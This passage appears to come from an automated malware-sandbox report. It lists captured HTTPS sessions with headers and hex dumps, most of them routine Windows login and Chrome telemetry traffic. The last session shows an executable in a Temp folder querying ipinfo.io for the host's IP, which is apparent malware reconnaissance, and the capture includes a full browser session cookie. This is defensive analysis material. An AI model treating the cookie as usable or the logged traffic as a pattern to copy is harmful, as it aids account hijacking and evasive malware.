                                                                                                                                                                                                                                      Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                      2024-04-19 01:29:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      30192.168.2.54984640.126.29.15443
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:53 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 4775
                                                                                                                                                                                                                                      Host: login.live.com
                                                                                                                                                                                                                                      2024-04-19 01:29:53 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                      2024-04-19 01:29:54 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:53 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C517_SN1
                                                                                                                                                                                                                                      x-ms-request-id: e220db18-2be6-4d91-a722-1a3edbd85db4
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002EFEE V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:53 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 11390
                                                                                                                                                                                                                                      2024-04-19 01:29:54 UTC11390INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      31192.168.2.549847142.250.105.1004438152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:54 UTC1299OUTPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                      Host: play.google.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Content-Length: 1035
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                      sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                      X-Goog-AuthUser: 0
                                                                                                                                                                                                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                      sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                      sec-ch-ua-model: ""
                                                                                                                                                                                                                                      sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Origin: https://accounts.google.com
                                                                                                                                                                                                                                      X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Referer: https://accounts.google.com/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: NID=513=Wn_CXjX-2VcI2iEH6-uf7IUePLFc4zBcZ5vvY-BWgQvpNRI2f83XMZSN8I8vpr_zVSnn2kuylSlPWe9bMQ9F7_ZSYiXZB3ejeKgovAjDWcyn1Rq4N3Q7gs6ZYzU-MpFJmgiei_3kV_Pkj1gTb1dtpR074N1k4RWBiyHeYX0t3hs
                                                                                                                                                                                                                                      2024-04-19 01:29:54 UTC1035OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 22 62 6f 71 5f 69 64 65 6e 74 69 74 79 66 72 6f 6e 74 65 6e 64 61 75 74 68 75 69 73 65 72 76 65 72 5f 32 30 32 34 30 34 31 34 2e 30 38 5f 70 30 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 34 2c 30 2c 30
                                                                                                                                                                                                                                      Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,"boq_identityfrontendauthuiserver_20240414.08_p0",null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[4,0,0
                                                                                                                                                                                                                                      2024-04-19 01:29:54 UTC523INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://accounts.google.com
                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:54 GMT
                                                                                                                                                                                                                                      Server: Playlog
                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      2024-04-19 01:29:54 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                      2024-04-19 01:29:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      32192.168.2.54984940.126.29.15443
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:55 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 4775
                                                                                                                                                                                                                                      Host: login.live.com
                                                                                                                                                                                                                                      2024-04-19 01:29:55 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                      2024-04-19 01:29:55 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:55 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C517_SN1
                                                                                                                                                                                                                                      x-ms-request-id: 132f8987-4a20-426a-8b3f-ad7bb169bcc3
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002F030 V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:54 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 11390
                                                                                                                                                                                                                                      2024-04-19 01:29:55 UTC11390INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      33192.168.2.54985240.126.29.15443
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:55 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 4775
                                                                                                                                                                                                                                      Host: login.live.com
                                                                                                                                                                                                                                      2024-04-19 01:29:55 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                      2024-04-19 01:29:56 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:56 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C517_SN1
                                                                                                                                                                                                                                      x-ms-request-id: 94d47410-a5a4-4704-b59d-ecc5abcccd57
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002F02B V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:55 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 11390
                                                                                                                                                                                                                                      2024-04-19 01:29:56 UTC11390INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      34192.168.2.54985540.126.29.15443
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:56 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 4775
                                                                                                                                                                                                                                      Host: login.live.com
                                                                                                                                                                                                                                      2024-04-19 01:29:56 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                      2024-04-19 01:29:57 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:57 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C517_SN1
                                                                                                                                                                                                                                      x-ms-request-id: 6be07b22-f55d-4fe1-a790-b804e60b99d2
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002FAB3 V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:56 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 11390
                                                                                                                                                                                                                                      2024-04-19 01:29:57 UTC11390INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      35192.168.2.54987434.117.186.1924437476C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:30:05 UTC237OUTGET /widget/demo/81.181.57.52 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Referer: https://ipinfo.io/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: ipinfo.io
                                                                                                                                                                                                                                      2024-04-19 01:30:05 UTC513INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.24.0
                                                                                                                                                                                                                                      date: Fri, 19 Apr 2024 01:30:05 GMT
                                                                                                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                      Content-Length: 980
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      referrer-policy: strict-origin-when-cross-origin
